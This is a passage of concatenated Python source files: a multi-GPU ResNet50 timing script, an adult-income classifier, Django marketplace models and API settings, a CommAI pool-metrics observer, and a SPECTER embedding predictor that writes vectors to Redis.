    model = ResNet50Base()
    parts = [
        model._part1(),
        model._part2(),
        model._part3(),
        model._part4(),
        model._part5(),
        model._part6(),
    ]
    # Configuration 1: everything on one GPU.
    local1_devices = ["cuda:0"]
    local1_model = ResNet50OneGPU(copy.deepcopy(parts), local1_devices)
    local1_opt = optim.SGD(local1_model.parameters(), lr=0.05)
    # Configuration 2: model split across two GPUs.
    local2_devices = ["cuda:1", "cuda:2"]
    local2_model = ResNet50TwoGPUs(copy.deepcopy(parts), local2_devices)
    local2_opt = optim.SGD(local2_model.parameters(), lr=0.05)
    # Configuration 3: model split across six GPUs.
    local3_devices = ["cuda:0", "cuda:1", "cuda:2", "cuda:3", "cuda:4", "cuda:5"]
    local3_model = ResNet50SixGPUs(copy.deepcopy(parts), local3_devices)
    local3_opt = optim.SGD(local3_model.parameters(), lr=0.05)
    def train(epoch):
        """Run one training epoch, stepping all three model placements on each
        batch and timing each placement's forward/backward pass."""
        total = 0
        local1_model.train()
        local1_train_loss = 0
        local1_correct = 0
        local1_start = 0
        local1_finish = 0
        local2_model.train()
        local2_train_loss = 0
        local2_correct = 0
        local2_start = 0
        local2_finish = 0
        local3_model.train()
        local3_train_loss = 0
        local3_correct = 0
        local3_start = 0
        local3_finish = 0
        pbar = tqdm(trainloader)
        for batch_idx, (inputs, labels) in enumerate(pbar):
            total += labels.size(0)
            # --- configuration 1: single GPU ---
            # Labels go to the LAST device (where the output lands), inputs to
            # the FIRST device of the pipeline.
            local1_start = time.time()
            local1_labels = labels.to(local1_devices[-1])
            local1_opt.zero_grad()
            local1_outputs = local1_model(inputs.to(local1_devices[0]))
            local1_loss = loss_fn(local1_outputs, local1_labels)
            local1_loss.backward()
            local1_opt.step()
            local1_train_loss += local1_loss.item()
            _, local1_predicted = local1_outputs.max(1)
            local1_correct += local1_predicted.eq(local1_labels).sum().item()
            local1_finish = time.time()
            # --- configuration 2: two-GPU pipeline ---
            local2_start = time.time()
            local2_labels = labels.to(local2_devices[-1])
            local2_opt.zero_grad()
            local2_outputs = local2_model(inputs.to(local2_devices[0]))
            local2_loss = loss_fn(local2_outputs, local2_labels)
            local2_loss.backward()
            local2_opt.step()
            local2_train_loss += local2_loss.item()
            _, local2_predicted = local2_outputs.max(1)
            local2_correct += local2_predicted.eq(local2_labels).sum().item()
            local2_finish = time.time()
            # --- configuration 3: six-GPU pipeline ---
            local3_start = time.time()
            local3_labels = labels.to(local3_devices[-1])
            local3_opt.zero_grad()
            local3_outputs = local3_model(inputs.to(local3_devices[0]))
            local3_loss = loss_fn(local3_outputs, local3_labels)
            local3_loss.backward()
            local3_opt.step()
            local3_train_loss += local3_loss.item()
            _, local3_predicted = local3_outputs.max(1)
            local3_correct += local3_predicted.eq(local3_labels).sum().item()
            local3_finish = time.time()
            # Per-batch wall-clock time for each placement.
            pbar.set_postfix({'l1': (local1_finish - local1_start), 'l2': (local2_finish - local2_start), 'l3': (local3_finish - local3_start)})
            # progress_bar(batch_idx, len(trainloader), '| %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d)'
            #             % (local1_train_loss/(batch_idx+1), 100.*local1_correct/total, local1_correct, total,
            #                local2_train_loss/(batch_idx+1), 100.*local2_correct/total, local2_correct, total,
            #                local3_train_loss/(batch_idx+1), 100.*local3_correct/total, local3_correct, total))
        # All three placements share initial weights and see identical batches.
        # NOTE(review): exact float equality across device placements is fragile
        # (nondeterministic kernels / reduction order) — confirm on target HW.
        assert local1_train_loss == local2_train_loss == local3_train_loss
        assert local1_correct == local2_correct == local3_correct
    def test(epoch):
        """Evaluate all three model placements on the test set (no gradients),
        timing each placement's forward pass per batch."""
        total = 0
        local1_model.eval()
        local1_test_loss = 0
        local1_correct = 0
        local1_start = 0
        local1_finish = 0
        local2_model.eval()
        local2_test_loss = 0
        local2_correct = 0
        local2_start = 0
        local2_finish = 0
        local3_model.eval()
        local3_test_loss = 0
        local3_correct = 0
        local3_start = 0
        local3_finish = 0
        pbar = tqdm(testloader)
        with torch.no_grad():
            for batch_idx, (inputs, labels) in enumerate(pbar):
                total += labels.size(0)
                # --- configuration 1: single GPU ---
                local1_start = time.time()
                local1_labels = labels.to(local1_devices[-1])
                local1_outputs = local1_model(inputs.to(local1_devices[0]))
                local1_loss = loss_fn(local1_outputs, local1_labels)
                local1_test_loss += local1_loss.item()
                _, local1_predicted = local1_outputs.max(1)
                local1_correct += local1_predicted.eq(local1_labels).sum().item()
                local1_finish = time.time()
                # --- configuration 2: two-GPU pipeline ---
                local2_start = time.time()
                local2_labels = labels.to(local2_devices[-1])
                local2_outputs = local2_model(inputs.to(local2_devices[0]))
                local2_loss = loss_fn(local2_outputs, local2_labels)
                local2_test_loss += local2_loss.item()
                _, local2_predicted = local2_outputs.max(1)
                local2_correct += local2_predicted.eq(local2_labels).sum().item()
                local2_finish = time.time()
                # --- configuration 3: six-GPU pipeline ---
                local3_start = time.time()
                local3_labels = labels.to(local3_devices[-1])
                local3_outputs = local3_model(inputs.to(local3_devices[0]))
                local3_loss = loss_fn(local3_outputs, local3_labels)
                local3_test_loss += local3_loss.item()
                _, local3_predicted = local3_outputs.max(1)
                local3_correct += local3_predicted.eq(local3_labels).sum().item()
                local3_finish = time.time()
                # Per-batch wall-clock time for each placement.
                pbar.set_postfix({'l1': (local1_finish - local1_start), 'l2': (local2_finish - local2_start), 'l3': (local3_finish - local3_start)})
                # progress_bar(batch_idx, len(testloader), '| %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d)'
                #             % (local1_test_loss/(batch_idx+1), 100.*local1_correct/total, local1_correct, total,
                #                local2_test_loss/(batch_idx+1), 100.*local2_correct/total, local2_correct, total,
                #                local3_test_loss/(batch_idx+1), 100.*local3_correct/total, local3_correct, total))
        # Same caveat as train(): exact float equality across placements.
        assert local1_test_loss == local2_test_loss == local3_test_loss
        assert local1_correct == local2_correct == local3_correct
    # Train and evaluate all three configurations for 10 epochs.
    for epoch in range(10):
        print('\nEpoch: %d' % epoch)
        train(epoch)
        test(epoch)
|
"""Train income classifiers on the adult dataset and persist the chosen model.

Pipeline: load CSV -> impute '?' with each column's mode -> discretize marital
status -> label-encode categoricals -> train/evaluate LinearRegression and
LogisticRegression -> pickle the LogisticRegression model for the web app.
"""
import pandas
import numpy
import pickle
import sklearn
from sklearn import tree
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
# BUG FIX: the yellowbrick class is ClassificationReport (CamelCase); the
# original `from yellowbrick.classifier import classificationReport` raises
# ImportError before anything else runs.
from yellowbrick.classifier import ClassificationReport
# Get the dataset and read the dataset
get_dataset = "static/assets/dataset/adult.csv"
read_dataset = pandas.read_csv(get_dataset)
# Replace '?' placeholders with NaN, then fill each column's NaNs with the
# column's modal (most frequent) value.
for col in read_dataset:
    read_dataset[col] = read_dataset[col].replace("?", numpy.NaN)
read_dataset = read_dataset.apply(lambda x: x.fillna(x.value_counts().index[0]))
# Data discretization: collapse marital status into three readable buckets.
read_dataset.replace(['Divorced','Married-AF-spouse','Married-civ-spouse','Married-spouse-absent','Never-married','Separated','Widowed'],['divorced','married','married','married','not married','not married','not married'], inplace=True)
# Label-encode every categorical column.
category_columns = ['workclass', 'race', 'education', 'marital-status', 'occupation', 'relationship', 'gender', 'native-country', 'income']
labelEncoder = preprocessing.LabelEncoder()
# Mapping the dictionary of values
mapping_dict = {}
for col in category_columns:
    read_dataset[col] = labelEncoder.fit_transform(read_dataset[col])
    le_name_mapping = dict(zip(labelEncoder.classes_, labelEncoder.transform(labelEncoder.classes_)))
    # NOTE(review): this keeps only the LAST column's mapping ('income');
    # if per-column mappings are needed, use mapping_dict[col] = le_name_mapping.
    mapping_dict = le_name_mapping
# Drop columns which are not useful for the model.
read_dataset = read_dataset.drop(['fnlwgt', 'educational-num'], axis=1)
read_dataset.head()
# Features are the first 12 columns; the target (encoded income) is column 12.
X = read_dataset.values[:, :12]
y = read_dataset.values[:, 12]
# 70/30 train/test split (fixed seed for reproducibility).
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=100)
# LinearRegression used as a (crude) classifier: its predictions are
# continuous, so they are rounded to the nearest integer class label.
# BUG FIX: accuracy_score rejects continuous targets with
# "continuous is not supported"; the original call crashed.
linear_reg = LinearRegression()
linear_reg.fit(X_train, y_train)
prediction_Lreg = linear_reg.predict(X_test)
print("Accuracy Score using LinearRegression is:", accuracy_score(y_test.astype(int), prediction_Lreg.round().astype(int)))
# LogisticRegression: a real classifier, predictions are already labels.
logistic_reg = LogisticRegression()
logistic_reg.fit(X_train, y_train)
prediction_Loreg = logistic_reg.predict(X_test)
print("Accuracy Score using LogisticRegression is:", accuracy_score(y_test, prediction_Loreg))
# Classification report for LinearRegression.
# BUG FIX: ClassificationReport.score(X, y) takes features and true labels —
# the visualizer predicts internally; the original passed (y_test, predictions).
# NOTE(review): yellowbrick expects a classifier here; wrapping a regressor
# may be rejected — confirm this plot is wanted for LinearRegression.
visualiser = ClassificationReport(linear_reg, classes=['won', 'loss'])
visualiser.fit(X_train, y_train)
visualiser.score(X_test, y_test)
result = visualiser.poof()
# Classification report for LogisticRegression.
visualiser = ClassificationReport(logistic_reg, classes=['won', 'loss'])
visualiser.fit(X_train, y_train)
visualiser.score(X_test, y_test)
result = visualiser.poof()
# After analysis, LogisticRegression is the chosen model; persist it so the
# web app can load it without retraining.
pickle.dump(logistic_reg, open('model.pkl', 'wb'))
<reponame>gurnitha/2022-django4-marketplace-jfu<filename>app/marketplace/models.py
# app/marketplace/models.py
# Django modules
from django.db import models
# Locals
from app.accounts.models import Users
# Create your models here.
# NAMA MODEL/TABEL: Categories
# NAMA MODEL/TABEL: Categories
class Categories(models.Model):
    """Top-level marketplace product category."""
    name_category = models.CharField(max_length=100)
    # NOTE(review): "titile" typo kept — renaming the field requires a migration.
    titile_list_category = models.CharField(max_length=100)
    slug = models.SlugField(max_length=225, unique=True)
    image_category = models.ImageField(upload_to='products/categories/%Y/%m/%d', blank=True)
    icon_category = models.ImageField(upload_to='products/categories/icons/%Y/%m/%d', blank=True)
    # FIX: IntegerField default was the string '0'; use the integer 0.
    view_category = models.IntegerField(default=0)
    date_created_category = models.DateTimeField(auto_now_add=True)
    date_updated_category = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('name_category',)
        verbose_name_plural = "Categories"

    def __str__(self):
        return self.name_category
# NAMA MODEL/TABEL: Subcategories
# NAMA MODEL/TABEL: Subcategories
class Subcategories(models.Model):
    """Second-level category, owned by a Categories row."""
    id_category_subcategory = models.ForeignKey(Categories, on_delete=models.CASCADE)
    titile_list_category = models.CharField(max_length=100)
    name_subcategory = models.CharField(max_length=100)
    slug = models.SlugField(max_length=225, unique=True)
    image_subcategory = models.ImageField(upload_to='products/subcategories/%Y/%m/%d', blank=True, null=True)
    # FIX: IntegerField default was the string '0'; use the integer 0.
    view_subcategory = models.IntegerField(default=0)
    date_created_subcategory = models.DateTimeField(auto_now_add=True)
    date_updated_subcategory = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('name_subcategory',)
        verbose_name_plural = "Subcategories"

    def __str__(self):
        return self.name_subcategory
# NAMA MODEL/TABEL: Stores
# NAMA MODEL/TABEL: Stores
class Stores(models.Model):
    """A seller's store; each store belongs to one Users account."""
    id_user_store = models.ForeignKey(Users, on_delete=models.CASCADE)
    name_store = models.CharField(max_length=100)
    slug = models.SlugField(max_length=225, unique=True)
    logo_store = models.ImageField(upload_to='products/stores/%Y/%m/%d', blank=True, null=True)
    cover_store = models.ImageField(upload_to='products/stores/%Y/%m/%d', blank=True, null=True)
    about_store = models.TextField()
    abstract_store = models.TextField()
    email_store = models.CharField(max_length=100)
    country_store = models.CharField(max_length=50)
    city_store = models.CharField(max_length=50)
    address_store = models.TextField()
    phone_store = models.CharField(max_length=50)
    socialnetwork_store = models.TextField()
    products_store = models.TextField()
    date_created_store = models.DateTimeField(auto_now_add=True)
    date_updated_store = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('name_store',)
        verbose_name_plural = "Stores"

    def __str__(self):
        return self.name_store
# NAMA MODEL/TABEL: Products
# NAMA MODEL/TABEL: Products
class Products(models.Model):
    """A product listing; belongs to a store, a category, and a subcategory."""
    feedback_product = models.TextField()
    state_product = models.CharField(max_length=50)
    id_store_product = models.ForeignKey(Stores, on_delete=models.CASCADE)
    id_category_product = models.ForeignKey(Categories, on_delete=models.CASCADE)
    id_subcategory_product = models.ForeignKey(Subcategories, on_delete=models.CASCADE)
    title_list_product = models.CharField(max_length=50)
    name_product = models.CharField(max_length=50)
    slug = models.SlugField(max_length=225, unique=True)
    # FIX: a misplaced quote put ", blank=True" INSIDE the upload_to string
    # ('products/products/%Y/%m/%d, blank=True'), so uploads went to a junk
    # path and the field was not actually blank-able.
    image_product = models.ImageField(upload_to='products/products/%Y/%m/%d', blank=True, null=True)
    price_product = models.DecimalField(max_digits=10, decimal_places=2)
    shipping_product = models.CharField(max_length=50)
    # FIX: IntegerField defaults were the string '0'; use the integer 0.
    stock_product = models.IntegerField(default=0)
    delivery_time_product = models.IntegerField(default=0)
    offer_product = models.CharField(max_length=100)
    description_product = models.TextField()
    summary_product = models.TextField()
    details_product = models.TextField()
    specifications_product = models.CharField(max_length=50)
    gallery_product = models.CharField(max_length=50)
    video_product = models.TextField()
    top_banner_product = models.CharField(max_length=255)
    default_banner_product = models.CharField(max_length=255)
    horizontal_slider_product = models.TextField()
    vertical_slider_product = models.TextField()
    reviews_product = models.TextField()
    tags_product = models.CharField(max_length=50)
    sales_product = models.IntegerField(default=0)
    views_product = models.IntegerField(default=0)
    date_created_product = models.DateTimeField(auto_now_add=True)
    date_updated_product = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('name_product',)
        verbose_name_plural = "Products"

    def __str__(self):
        return self.name_product
|
<reponame>germank/CommAI-env<gh_stars>0
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from pool_metrics import PoolMetrics
from json_reporter import JSONReporter
from console_reporter import ConsoleReporter
class PoolObserver(object):
    """Observes a reaction pool: accumulates PoolMetrics and periodically
    reports them to the console and (optionally) a JSON log file."""
    def __init__(self, period, log_filename, food_size, history_size):
        # period: report every `period` ticks.
        # log_filename: JSON log path; a falsy value disables the JSON reporter.
        self.pool_metrics = PoolMetrics(food_size, history_size)
        self.period = period
        self.json_reporter = JSONReporter(self.pool_metrics, log_filename)\
            if log_filename else None
        self.console_reporter = ConsoleReporter(self.pool_metrics, period)
        # Registration order below fixes the console column order; metrics
        # without an abbreviation go only to the JSON log.
        self.track_metric('current_expressions_count', 'count')
        self.track_metric('current_expressions_distinct_count', 'dcount')
        self.track_metric('current_expressions_reducible_count', 'red.count')
        self.track_metric('current_expressions_top10_length')
        self.track_metric('current_expressions_max_length', 'maxlen')
        self.track_metric('current_expressions_mean_length')
        # debug
        self.track_metric('current_expressions_max_depth', 'maxdepth')
        #self.track_metric('current_expressions_reduction_count', 'reductions', '{:.1f}')
        # end debug
        self.track_metric('current_expressions_mean_length', 'meanlen', '{:.2f}')
        self.track_metric('recent_expressions_recurrence_count')
        self.track_metric('recent_largest_scc_size', 'sccLen')
        self.track_metric('recent_scc_count', '#scc')
        self.track_metric('recent_raf_scc_count')
        self.track_metric('recent_raf_length', 'raf')
        self.track_metric('recent_raf_product_max_length')
        self.track_metric('recent_raf_products_count')
        self.track_metric('recent_reactions_count')
        self.track_metric('current_expressions_max_multiplicity')
        self.track_metric('current_expressions_mean_multiplicity')
        self.track_metric('current_expressions_percent_at_1', '@1', '{:.0f}')
        self.track_metric('current_expressions_percent_at_2', '@2', '{:.0f}')
        self.track_metric('recent_raf_products_max_multiplicity', 'raf_mult')
        self.track_metric('recent_raf_complement_products_max_multiplicity')
        self.track_metric('recent_raf_cycle_length', 'raf_lvl')
        self.track_metric('recent_raf_substrate_count', 'sbst')
        self.track_metric('current_expressions_max_multiplicity_length')
        self.track_metric('current_p_reduce', 'Pr', '{:.2f}')
        self.track_metric('current_p_break')
        self.track_metric('current_p_combine')
        self.track_metric('current_n_reduce')
        self.track_metric('current_n_break')
        self.track_metric('current_n_combine')
        self.track_metric('current_total_size', 'T')
        #self.track_metric('recent_recurrent_expression_length', 'rec_expr_len')
        #self.track_metric('recent_raf_scc_expressions_multiplicity', 'scc_mult')
    def track_metric(self, metric, console_abbr=None, console_fmt='{}'):
        # Register a metric: always with the JSON reporter (if enabled); with
        # the console reporter only when an abbreviation is given.
        if self.json_reporter:
            self.json_reporter.track_metric(metric)
        if console_abbr:
            self.console_reporter.track_metric(metric, console_abbr, console_fmt)
    def on_step_computed(self, pool, ticks):
        # Emit a report every `period` ticks (skipping tick 0).
        if ticks > 0 and ticks % self.period == 0:
            self.report(ticks)
    def on_reaction_computed(self, pool, reaction):
        # Forward each reaction event to the metrics accumulator.
        self.pool_metrics.on_reaction_computed(pool, reaction)
    def report(self, generation):
        # Flush to the reporters, then clear the short-lived ("perishable") history.
        if self.json_reporter:
            self.json_reporter.report(generation)
        self.console_reporter.report(generation)
        self.pool_metrics.reset_perishable_history()
    def print_preceding_graph(self, graph, m, depth=1):
        # Debug helper: print the 'reduce' reactions that produced `m`,
        # recursing up to `depth` levels through each reaction's larger members.
        if depth > 0:
            for reaction in graph.predecessors(m):
                reactives = list(map(str, reaction.reactives))
                # NOTE(review): graph.node is the pre-networkx-2.4 API — confirm
                # the pinned networkx version, or switch to graph.nodes[...].
                reaction_type = graph.node[reaction]['reaction_type']
                if reaction_type != 'reduce':
                    continue
                print(reaction_type, " + ".join(reactives), '->', m)
                for r in reaction:
                    if r.size() > 4:
                        #if term.is_reducible(r, None):
                        #    print(" / ".join(map(term.to_str, map(operator.itemgetter(0), term.all_reductions(r)))))
                        self.print_preceding_graph(graph, r, depth-1)
|
<gh_stars>0
"""
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
from datetime import timedelta
from api import config
import os
import secrets
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#Cybercom config settings
APPLICATION_TITLE = config.APPLICATION_TITLE
API_VERSION='2.0'
# Set default model primary key field type
DEFAULT_AUTO_FIELD = 'django.db.models.AutoField'
# Session cookies
# https://docs.djangoproject.com/en/2.2/ref/settings/#session-cookie-domain
# wild card '*.example.edu'
# None restricts cookies to the exact host that served them.
SESSION_COOKIE_DOMAIN = None
CSRF_COOKIE_DOMAIN = None
# If you want to mount API with nginx with location other than /
# Change to desired url - '/api/'
FORCE_SCRIPT_NAME = '/api/'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# Trust the proxy's forwarded host/protocol headers (API sits behind nginx).
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE: the fallback generates a fresh random key per process, which
# invalidates sessions and signed cookies on every restart — fine for dev,
# but set DJANGO_SECRET_KEY in production.
SECRET_KEY = os.getenv('DJANGO_SECRET_KEY', secrets.token_urlsafe(64))
# SECURITY WARNING: don't run with debug turned on in production!
# `in` already yields a bool; the redundant bool() wrapper is dropped.
DEBUG = os.getenv('DEBUG') in ('True', 'true')
# Comma-separated host list from the environment; blanks are stripped out.
ALLOWED_HOSTS = [host.strip() for host in os.getenv('ALLOWED_HOSTS', '').split(',') if host.strip()]
# Logging: console-only (collected by the container runtime / process manager).
# The 'standard' formatter uses str.format-style fields ('style': '{').
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'standard': {
            'format': '[{asctime}] [{module}] [{levelname}] - {message}',
            'datefmt': '%Y-%m-%d %H:%M:%S',
            'style': '{',
        },
    },
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'formatter': 'standard',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['console'],
            # Level is tunable at deploy time via the DJANGO_LOG_LEVEL env var.
            'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
        },
    },
}

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # third-party: Django REST Framework + token auth + JWT blacklist support
    'rest_framework',
    'rest_framework.authtoken',
    'rest_framework_simplejwt.token_blacklist',
    # project apps
    'data_store',
    'catalog',
    'cybercom_queue',
]
MIDDLEWARE = [
    'django.middleware.gzip.GZipMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                # django-settings-export: exposes SETTINGS_EXPORT to templates
                'django_settings_export.settings_export',
            ],
        },
    },
]
CACHES = {
    'default': {
        # NOTE(review): MemcachedCache was deprecated in Django 3.2 and removed
        # in 4.1 -- fine for the Django 2.1 target documented in the header,
        # but must change (e.g. PyMemcacheCache) if Django is upgraded.
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': f'{config.MEMCACHE_HOST}:{config.MEMCACHE_PORT}',
    }
}
# Settings exported into template context (via django-settings-export above),
# available as `my_settings.APPLICATION_TITLE` etc.
SETTINGS_EXPORT_VARIABLE_NAME = 'my_settings'
SETTINGS_EXPORT = [
    'APPLICATION_TITLE',
    'API_VERSION',
]
WSGI_APPLICATION = 'api.wsgi.application'
REST_FRAMEWORK = {
    # Authentication attempts run in order: JWT, then DRF token, then session.
    'DEFAULT_AUTHENTICATION_CLASSES': (
        #'rest_framework.authentication.BasicAuthentication',
        'rest_framework_simplejwt.authentication.JWTAuthentication',
        'rest_framework.authentication.TokenAuthentication',
        'rest_framework.authentication.SessionAuthentication',
    ),
    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
    # NOTE(review): PAGINATE_BY / PAGINATE_BY_PARAM / MAX_PAGINATE_BY are the
    # pre-DRF-3.1 setting names; modern DRF reads PAGE_SIZE and per-class
    # pagination attributes -- verify against the installed DRF version.
    'PAGINATE_BY': 10,
    'PAGINATE_BY_PARAM': 'page_size',
    'MAX_PAGINATE_BY': 1000000
}
# Customize JWT (djangorestframework-simplejwt)
SIMPLE_JWT = {
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
    'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
    'ROTATE_REFRESH_TOKENS': False,
    'BLACKLIST_AFTER_ROTATION': True,
    'ALGORITHM': 'HS256',
    # Tokens are signed with the Django SECRET_KEY (symmetric HS256).
    'SIGNING_KEY': SECRET_KEY,
    'VERIFYING_KEY': None,
    'AUTH_HEADER_TYPES': ('Bearer',),
    # Identify users by username (not pk) in the token claims.
    'USER_ID_FIELD': 'username',
    'USER_ID_CLAIM': 'username',
    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
    'TOKEN_TYPE_CLAIM': 'token_type',
    'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
    'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
    'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
DATABASE_ROUTERS = []
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
#STATICFILES_DIRS = [
#    os.path.join(BASE_DIR, "static"),
#]
|
<filename>expertise/models/multifacet_recommender/specter.py
from allennlp.commands.predict import _PredictManager
from allennlp.common import Params
from allennlp.common.checks import ConfigurationError
from allennlp.common.util import lazy_groups_of, import_submodules
from allennlp.data import DatasetReader
from allennlp.models import Archive
from allennlp.models.archival import load_archive
from allennlp.predictors.predictor import Predictor, DEFAULT_PREDICTORS
from collections import defaultdict
import json
import os
import torch
from tqdm import tqdm
from typing import Optional
import redisai
import numpy as np
from expertise.service.server import redis_embeddings_pool
import logging
# Silence AllenNLP's very chatty parameter/registry loggers; keep the
# registrable logger at WARNING so genuine problems still surface.
logging.getLogger('allennlp.common.params').disabled = True
logging.getLogger('allennlp.common.from_params').disabled = True
logging.getLogger('allennlp.common.registrable').setLevel(logging.WARNING)
logging.getLogger('allennlp.nn.initializers').disabled = True
# Register the 'specter' package's custom readers/predictors with AllenNLP.
import_submodules('specter')
"""
archive_file: $SPECTER_FOLDER/model.tar.gz
input_file: $SAMPLE_ID_TRAIN
include-package: specter
predictor: specter_predictor
overrides:
model:
predict_mode: 'true'
include_venue: 'false'
dataset_reader:
type: 'specter_data_reader'
predict_mode: 'true'
paper_features_path: $SPECTER_TRAIN_FILE
included_text_fields: 'abstract title'
vocabulary:
directory_path: $SPECTER_FOLDER/data/vocab/
cuda-device: 0
output-file: $SPECTER_TRAIN_EMB_RAW
batch-size: 16
silent
"""
class _PredictManagerCustom(_PredictManager):
    """
    Source: https://github.com/allenai/specter/blob/master/scripts/embed.py
    Extends allennlp's _PredictManager:
      * `run` shows batch-level progress with tqdm
      * predictions can additionally be written to Redis as tensors,
        keyed by paper_id
    """

    def __init__(self,
                 predictor: Predictor,
                 input_file: str,
                 output_file: Optional[str],
                 batch_size: int,
                 print_to_console: bool,
                 has_dataset_reader: bool,
                 store_redis: bool = False,
                 redis_con=None) -> None:
        super(_PredictManagerCustom, self).__init__(predictor, input_file, output_file, batch_size, print_to_console,
                                                    has_dataset_reader)
        # Number of batches, used as tqdm's `total`. Fixed: the original
        # opened the input file without ever closing it (handle leak) and
        # materialized a throwaway list just to sum it.
        with open(self._input_file) as f_in:
            num_lines = sum(1 for _ in f_in)
        self.total_size = int(num_lines / self._batch_size)
        self._store_redis = store_redis
        if store_redis:
            assert redis_con is not None, "Can't store in Redis, No redis connection provided"
        # Always set the attribute so it exists even when store_redis is False.
        self._redis_con = redis_con

    def run(self) -> None:
        """Predict over the whole input, reporting progress per batch."""
        has_reader = self._dataset_reader is not None
        index = 0
        if has_reader:
            # Reader path: instances come from the dataset reader.
            for batch in tqdm(lazy_groups_of(self._get_instance_data(), self._batch_size), total=self.total_size,
                              unit="batches"):
                for model_input_instance, result in zip(batch, self._predict_instances(batch)):
                    self._maybe_print_to_console_and_file(index, result, str(model_input_instance))
                    index += 1
        else:
            # JSON-lines path: raw dicts straight from the input file.
            for batch_json in tqdm(lazy_groups_of(self._get_json_data(), self._batch_size), total=self.total_size,
                                   unit="batches"):
                for model_input_json, result in zip(batch_json, self._predict_json(batch_json)):
                    self._maybe_print_to_console_and_file(index, result, json.dumps(model_input_json))
                    index += 1
        if self._output_file is not None:
            self._output_file.close()

    def _maybe_print_to_console_and_file(self,
                                         index: int,
                                         prediction: str,
                                         model_input: str = None) -> None:
        """Emit one prediction to console, output file and/or Redis."""
        if self._print_to_console:
            if model_input is not None:
                print(f"input {index}: ", model_input)
            print("prediction: ", prediction)
        if self._output_file is not None:
            self._output_file.write(prediction)
        if self._store_redis:
            # Fixed: parse the JSON only when we actually need fields from it
            # (the original parsed every prediction unconditionally).
            prediction_json = json.loads(prediction)
            self._redis_con.tensorset(key=prediction_json['paper_id'], tensor=np.array(prediction_json['embedding']))
def predictor_from_archive(archive: Archive, predictor_name: str = None,
                           paper_features_path: str = None) -> 'Predictor':
    """
    Source: https://github.com/allenai/specter/blob/master/scripts/embed.py
    Extends allennlp.predictors.predictor.from_archive to allow processing a
    'multiprocess' dataset reader: in that case the wrapped base_reader config
    is used, with its paper_features_path replaced when one is supplied.

    :param archive: loaded model archive (config + weights)
    :param predictor_name: registered predictor name; when omitted, the
        model type's default predictor is looked up
    :param paper_features_path: replacement features file for the
        multiprocess base reader
    :raises ConfigurationError: if no predictor_name is given and the model
        type has no default predictor
    """
    # Duplicate the config so that the config inside the archive doesn't get consumed
    config = archive.config.duplicate()
    if not predictor_name:
        model_type = config.get("model").get("type")
